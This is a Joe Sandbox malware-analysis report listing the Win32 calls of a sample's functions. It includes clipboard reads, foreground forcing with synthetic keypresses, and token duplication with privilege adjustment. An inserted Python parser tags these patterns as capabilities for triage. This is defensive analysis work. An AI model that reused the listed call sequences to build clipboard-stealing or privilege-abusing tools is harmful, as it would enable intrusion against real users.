                    • Instruction Fuzzy Hash: 5DD0A730D0620DEBCB10CFB59D04ADAB3ACDB0C320F004754FE15D3280D73199409790
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                     • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: __wfsopen
                    • String ID:
                    • API String ID: 197181222-0
                    • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                    • Instruction ID: facd707aebfd671fb7faa2a4fcb214ff37fb19bbb7f64c5cda8fbc982a4360ee
                    • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                    • Instruction Fuzzy Hash: 27B0927A84020C77DE422E82EC02A593B199B40678F808020FB0C28162A673A6A0A689
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                     • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                    • Instruction ID: 0511858752256833e0c1876cd2ac9533e1d743854c6c883261e991eca1d1bb9b
                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                    • Instruction Fuzzy Hash: 9831E271A00105DFCB18DF59C488969F7A6FF59300B788AA5E89ACB651DB31EEC1CBC0
                    APIs
                    • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00CC758C,80070057,?,?), ref: 00CC7698
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                     • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: lstrcmpi
                    • String ID:
                    • API String ID: 1586166983-0
                    • Opcode ID: a0d721074449ff6b14dc1ded47dcada7c09ff819a36e52cd28832c3d66746c34
                    • Instruction ID: 0ab156948169958d839bb7264eee483b5898621ce2f71f1c0a81d5f64d5514d1
                    • Opcode Fuzzy Hash: a0d721074449ff6b14dc1ded47dcada7c09ff819a36e52cd28832c3d66746c34
                    • Instruction Fuzzy Hash: 3B017CB2601604ABDB109F68DC48FAE7BADEF497A1F24012CFD04D2221E771DE41DBA0
                    APIs
                    • Sleep.KERNELBASE(000001F4), ref: 031422B1
                    Memory Dump Source
                    • Source File: 00000000.00000002.2027121117.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3140000_jv4ri.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                    • Instruction ID: 6c3c1bca9b7eeeeff660752c286059c30010e535ed357a1793da84fcec7d70e1
                    • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                    • Instruction Fuzzy Hash: FBE0BF7494010EEFDB00EFE8D5496DE7BB4EF04311F1005A1FD05D7680DB309E548A62
                    APIs
                    • Sleep.KERNELBASE(000001F4), ref: 031422B1
                    Memory Dump Source
                    • Source File: 00000000.00000002.2027121117.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3140000_jv4ri.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                    • Instruction ID: b586f96b720a057a2142336a185fe785168c90ddf2ad7644f5492fc6b47f1a28
                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                    • Instruction Fuzzy Hash: 3AE0BF7494010E9FDB00EFA8D54969E7BB4EF04301F1005A1FD0192280D73099508A62
                    APIs
                      • Part of subcall function 00C72612: GetWindowLongW.USER32(?,000000EB), ref: 00C72623
                    • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?), ref: 00CFCE50
                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00CFCE91
                    • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00CFCED6
                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00CFCF00
                    • SendMessageW.USER32 ref: 00CFCF29
                    • _wcsncpy.LIBCMT ref: 00CFCFA1
                    • GetKeyState.USER32(00000011), ref: 00CFCFC2
                    • GetKeyState.USER32(00000009), ref: 00CFCFCF
                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00CFCFE5
                    • GetKeyState.USER32(00000010), ref: 00CFCFEF
                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00CFD018
                    • SendMessageW.USER32 ref: 00CFD03F
                    • SendMessageW.USER32(?,00001030,?,00CFB602), ref: 00CFD145
                    • SetCapture.USER32(?), ref: 00CFD177
                    • ClientToScreen.USER32(?,?), ref: 00CFD1DC
                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00CFD203
                    • ReleaseCapture.USER32 ref: 00CFD20E
                    • GetCursorPos.USER32(?), ref: 00CFD248
                    • ScreenToClient.USER32(?,?), ref: 00CFD255
                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 00CFD2B1
                    • SendMessageW.USER32 ref: 00CFD2DF
                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00CFD31C
                    • SendMessageW.USER32 ref: 00CFD34B
                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00CFD36C
                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00CFD37B
                    • GetCursorPos.USER32(?), ref: 00CFD39B
                    • ScreenToClient.USER32(?,?), ref: 00CFD3A8
                    • GetParent.USER32(?), ref: 00CFD3C8
                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 00CFD431
                    • SendMessageW.USER32 ref: 00CFD462
                    • ClientToScreen.USER32(?,?), ref: 00CFD4C0
                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00CFD4F0
                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00CFD51A
                    • SendMessageW.USER32 ref: 00CFD53D
                    • ClientToScreen.USER32(?,?), ref: 00CFD58F
                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00CFD5C3
                      • Part of subcall function 00C725DB: GetWindowLongW.USER32(?,000000EB), ref: 00C725EC
                    • GetWindowLongW.USER32(?,000000F0), ref: 00CFD65F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: MessageSend$ClientScreen$LongWindow$State$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                    • String ID: @GUI_DRAGID$F
                    • API String ID: 302779176-4164748364
                    • Opcode ID: 8f02187ae2f840751af04cfb34e4c9e89b12a7c5b58b35aad103b78c25fb6b8a
                    • Instruction ID: 02e32a61ffc58adb78ecfca08f81fb39f1fbba7f4a7e41bf8276ad15a526575a
                    • Opcode Fuzzy Hash: 8f02187ae2f840751af04cfb34e4c9e89b12a7c5b58b35aad103b78c25fb6b8a
                    • Instruction Fuzzy Hash: DE429974204249AFC765CF28C988BBABBE6FF48314F14451DF6A6872A0C731D951DBA3
                    APIs
                    • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00CF873F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID: %d/%02d/%02d
                    • API String ID: 3850602802-328681919
                    • Opcode ID: dc736caff66681a1e7f3b743a226f523575f807a6b424a729d389391c5fca15d
                    • Instruction ID: 047d8fb866a0ff4b5e7a7f80e85cb186063f050e441b40cefc2580f83cac27ad
                    • Opcode Fuzzy Hash: dc736caff66681a1e7f3b743a226f523575f807a6b424a729d389391c5fca15d
                    • Instruction Fuzzy Hash: B912C171500608ABEB659F25CC49FBE7BB8EF45710F204129FA15EA2E1DF709A49CB12
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: _memmove$_memset
                    • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                    • API String ID: 1357608183-1798697756
                    • Opcode ID: 3f3eb47c8226b8f95e25fefad944737401c94a27d0eb058cb25cb9a51ef20df9
                    • Instruction ID: 39889ee758d508137831a762d97fd29fea159e91c2a26ba90cd88d011a2aa79b
                    • Opcode Fuzzy Hash: 3f3eb47c8226b8f95e25fefad944737401c94a27d0eb058cb25cb9a51ef20df9
                    • Instruction Fuzzy Hash: F193CF71A00219DFDB28DF98D891BADB7B1FF48314F24816EE955EB280E7709E81CB54
                    APIs
                    • GetForegroundWindow.USER32(00000000,?), ref: 00C74A3D
                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00CADA8E
                    • IsIconic.USER32(?), ref: 00CADA97
                    • ShowWindow.USER32(?,00000009), ref: 00CADAA4
                    • SetForegroundWindow.USER32(?), ref: 00CADAAE
                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00CADAC4
                    • GetCurrentThreadId.KERNEL32 ref: 00CADACB
                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00CADAD7
                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 00CADAE8
                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 00CADAF0
                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 00CADAF8
                    • SetForegroundWindow.USER32(?), ref: 00CADAFB
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00CADB10
                    • keybd_event.USER32(00000012,00000000), ref: 00CADB1B
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00CADB25
                    • keybd_event.USER32(00000012,00000000), ref: 00CADB2A
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00CADB33
                    • keybd_event.USER32(00000012,00000000), ref: 00CADB38
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00CADB42
                    • keybd_event.USER32(00000012,00000000), ref: 00CADB47
                    • SetForegroundWindow.USER32(?), ref: 00CADB4A
                    • AttachThreadInput.USER32(?,?,00000000), ref: 00CADB71
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                    • String ID: Shell_TrayWnd
                    • API String ID: 4125248594-2988720461
                    • Opcode ID: be16446f1e2e19a40bc55db4441c38cdc258dc7898721a35686b5eff3d59a2b2
                    • Instruction ID: eedd86647fe36fd84be6b658c51b87e9622c129cd551bd6fb8cae0d1c19c76db
                    • Opcode Fuzzy Hash: be16446f1e2e19a40bc55db4441c38cdc258dc7898721a35686b5eff3d59a2b2
                    • Instruction Fuzzy Hash: CA315371A40318BFEB216F619C49FBE7E6CEF45B50F114029FA06EA1D0CAB05D41EAB5
                    APIs
                    • OpenClipboard.USER32(00CFF910), ref: 00CE4284
                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00CE4292
                    • GetClipboardData.USER32(0000000D), ref: 00CE429A
                    • CloseClipboard.USER32 ref: 00CE42A6
                    • GlobalFix.KERNEL32(00000000), ref: 00CE42C2
                    • CloseClipboard.USER32 ref: 00CE42CC
                    • GlobalUnWire.KERNEL32(00000000), ref: 00CE42E1
                    • IsClipboardFormatAvailable.USER32(00000001), ref: 00CE42EE
                    • GetClipboardData.USER32(00000001), ref: 00CE42F6
                    • GlobalFix.KERNEL32(00000000), ref: 00CE4303
                    • GlobalUnWire.KERNEL32(00000000), ref: 00CE4337
                    • CloseClipboard.USER32 ref: 00CE4447
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Clipboard$Global$Close$AvailableDataFormatWire$Open
                    • String ID:
                    • API String ID: 941120096-0
                    • Opcode ID: 0e8ba6115e18a184f5e76834912acbc93a746b18160c5503448c9e1b2cd1da79
                    • Instruction ID: 304b766f8e6868623803a4019d4535620ea31a2166fb7fb88133bf502ed8125a
                    • Opcode Fuzzy Hash: 0e8ba6115e18a184f5e76834912acbc93a746b18160c5503448c9e1b2cd1da79
                    • Instruction Fuzzy Hash: 54519A31204246ABD315AF61EC86F7E77A8EF84B00F10452DF65AD22E1DF70DA06DB62
                    APIs
                      • Part of subcall function 00CC8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00CC8D0D
                      • Part of subcall function 00CC8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00CC8D3A
                      • Part of subcall function 00CC8CC3: GetLastError.KERNEL32 ref: 00CC8D47
                    • _memset.LIBCMT ref: 00CC889B
                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00CC88ED
                    • CloseHandle.KERNEL32(?), ref: 00CC88FE
                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00CC8915
                    • GetProcessWindowStation.USER32 ref: 00CC892E
                    • SetProcessWindowStation.USER32(00000000), ref: 00CC8938
                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00CC8952
                      • Part of subcall function 00CC8713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00CC8851), ref: 00CC8728
                      • Part of subcall function 00CC8713: CloseHandle.KERNEL32(?,?,00CC8851), ref: 00CC873A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                    • String ID: $default$winsta0
                    • API String ID: 2063423040-1027155976
                    • Opcode ID: 35e45e1578a6b05ddf66b045c9bd36f03716c40106271ee2aedd5e65805238f9
                    • Instruction ID: fe656423a5d3b7699b4cf483bb26edb2a4e0d263ed2ae76d9531538a76a55db0
                    • Opcode Fuzzy Hash: 35e45e1578a6b05ddf66b045c9bd36f03716c40106271ee2aedd5e65805238f9
                    • Instruction Fuzzy Hash: B8811971900219AEDF15DFA4DC45FAFBBB8EF04304F18416EF924A6261DB318E19EB61
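The three entries above (clipboard read via OpenClipboard/GetClipboardData, foreground forcing via AttachThreadInput plus synthetic ALT presses, and the DuplicateTokenEx/OpenWindowStation/OpenDesktop sequence with its privilege-adjusting subcall) are the kind of API patterns an analyst wants pulled out of a report like this automatically. The following parser is an added example, not part of the Joe Sandbox report or its IDA plugin: it reads the per-function "APIs" listings in the format shown on this page, tags each function with the capability its call set indicates, and maps each capability back to a code address. The sample input is constructed by copying a handful of lines from the entries above; the capability rules are the author's own triage heuristics, not a Joe Sandbox signature set.

```python
"""Parse the per-function 'APIs' listings of a Joe Sandbox disassembly report
and tag each function with the capability its Win32 call pattern indicates.
Added example; the sample below is copied from the report entries, the
capability rules are hand-written triage heuristics (an assumption, not a
sandbox signature set)."""
import re

# "• Name.MODULE(args), ref: ADDR"  or  "• Name.MODULE ref: ADDR"; subcall lines
# carry a "Part of subcall function XXXX:" prefix and extra indentation.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
META_LINE = re.compile(r"^\s*•\s*(API ID|String ID|Opcode ID):\s*(.*?)\s*$")

# Minimal call sets that together indicate a capability. Names are compared
# after stripping the A/W suffix so FindFirstFileW and FindFirstFileA both match.
CAPABILITIES = {
    "clipboard_read": {"OpenClipboard", "GetClipboardData"},
    # AttachThreadInput plus keybd_event with VK_MENU (0x12, ALT) is the classic
    # way to defeat SetForegroundWindow's foreground-lock rules.
    "foreground_forcing": {"AttachThreadInput", "SetForegroundWindow", "keybd_event"},
    "privilege_adjust": {"LookupPrivilegeValue", "AdjustTokenPrivileges"},
    "token_desktop_switch": {"DuplicateTokenEx", "OpenWindowStation", "OpenDesktop"},
    "registry_write": {"RegCreateKeyEx", "RegSetValueEx"},
    "directory_walk": {"FindFirstFile", "FindNextFile", "SetCurrentDirectory"},
}

# Constructed sample: lines copied from the report entries above.
SAMPLE = """\
APIs
• Sleep.KERNELBASE(000001F4), ref: 031422B1
Memory Dump Source
• Source File: 00000000.00000002.2027121117.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
APIs
• GetForegroundWindow.USER32(00000000,?), ref: 00C74A3D
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00CADA8E
• AttachThreadInput.USER32(?,00000000,00000001), ref: 00CADAE8
• SetForegroundWindow.USER32(?), ref: 00CADAFB
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00CADB10
• keybd_event.USER32(00000012,00000000), ref: 00CADB1B
Similarity
• API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
• String ID: Shell_TrayWnd
APIs
• OpenClipboard.USER32(00CFF910), ref: 00CE4284
• IsClipboardFormatAvailable.USER32(0000000D), ref: 00CE4292
• GetClipboardData.USER32(0000000D), ref: 00CE429A
• CloseClipboard.USER32 ref: 00CE42A6
APIs
  • Part of subcall function 00CC8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00CC8D0D
  • Part of subcall function 00CC8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00CC8D3A
• _memset.LIBCMT ref: 00CC889B
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00CC88ED
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00CC8915
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00CC8952
"""


def normalize(api):
    """Drop a trailing A/W (ANSI/wide) suffix: OpenDesktopW -> OpenDesktop."""
    return re.sub(r"(?<=[a-z])[AW]$", "", api)


def parse_report(text):
    """Split the listing into function records, one per 'APIs' header, and
    attach the sorted list of capabilities whose call set is fully present."""
    records, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = {"calls": [], "meta": {}}
            records.append(current)
            continue
        if current is None:
            continue
        m = META_LINE.match(line)
        if m:
            current["meta"][m.group(1)] = m.group(2)
            continue
        m = API_LINE.match(line)
        if m:
            current["calls"].append({
                "api": m.group("api"),
                "module": m.group("mod"),
                "args": m.group("args").split(",") if m.group("args") else [],
                "ref": int(m.group("ref"), 16),
                "subcall": m.group("sub"),          # callee address, or None
            })
    for rec in records:
        names = {normalize(c["api"]) for c in rec["calls"]}
        rec["capabilities"] = sorted(
            cap for cap, need in CAPABILITIES.items() if need <= names)
    return records


def capability_index(records):
    """Map each capability to the lowest call address of every function that
    shows it (subcall refs point into the callee, so they are skipped when a
    direct call is available). Handy as a worklist for the disassembler."""
    index = {}
    for rec in records:
        direct = [c["ref"] for c in rec["calls"] if not c["subcall"]]
        refs = direct or [c["ref"] for c in rec["calls"]]
        if not refs:
            continue
        for cap in rec["capabilities"]:
            index.setdefault(cap, []).append(f"{min(refs):08X}")
    return index


if __name__ == "__main__":
    for cap, addrs in capability_index(parse_report(SAMPLE)).items():
        print(f"{cap:22s} {', '.join(addrs)}")
```

Feeding the whole report text instead of SAMPLE works unchanged, since only the "APIs" headers and bullet lines are consulted; the rules are deliberately conservative (every API in a set must appear), so a GUI routine that happens to call GetKeyState or SendMessage is not flagged.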
                    APIs
                    • FindFirstFileW.KERNEL32(?,?), ref: 00CDC9F8
                    • FindClose.KERNEL32(00000000), ref: 00CDCA4C
                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00CDCA71
                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00CDCA88
                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00CDCAAF
                    • __swprintf.LIBCMT ref: 00CDCAFB
                    • __swprintf.LIBCMT ref: 00CDCB3E
                      • Part of subcall function 00C77F41: _memmove.LIBCMT ref: 00C77F82
                    • __swprintf.LIBCMT ref: 00CDCB92
                      • Part of subcall function 00C938D8: __woutput_l.LIBCMT ref: 00C93931
                    • __swprintf.LIBCMT ref: 00CDCBE0
                      • Part of subcall function 00C938D8: __flsbuf.LIBCMT ref: 00C93953
                      • Part of subcall function 00C938D8: __flsbuf.LIBCMT ref: 00C9396B
                    • __swprintf.LIBCMT ref: 00CDCC2F
                    • __swprintf.LIBCMT ref: 00CDCC7E
                    • __swprintf.LIBCMT ref: 00CDCCCD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                    • API String ID: 3953360268-2428617273
                    • Opcode ID: cdf667813ef9410d74a1171e13fdb1e8ec11857199f719cf19cd8702f5051434
                    • Instruction ID: 23bb33620781488a77ec0ee6d9a1df5730a691082403c26f27ccac3789c7f7f3
                    • Opcode Fuzzy Hash: cdf667813ef9410d74a1171e13fdb1e8ec11857199f719cf19cd8702f5051434
                    • Instruction Fuzzy Hash: ADA12FB1508345ABC710EB64C985DAFB7ECFF94700F40892EF59AC6191EB34DA09DB62
                    APIs
                    • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00CDF221
                    • _wcscmp.LIBCMT ref: 00CDF236
                    • _wcscmp.LIBCMT ref: 00CDF24D
                    • GetFileAttributesW.KERNEL32(?), ref: 00CDF25F
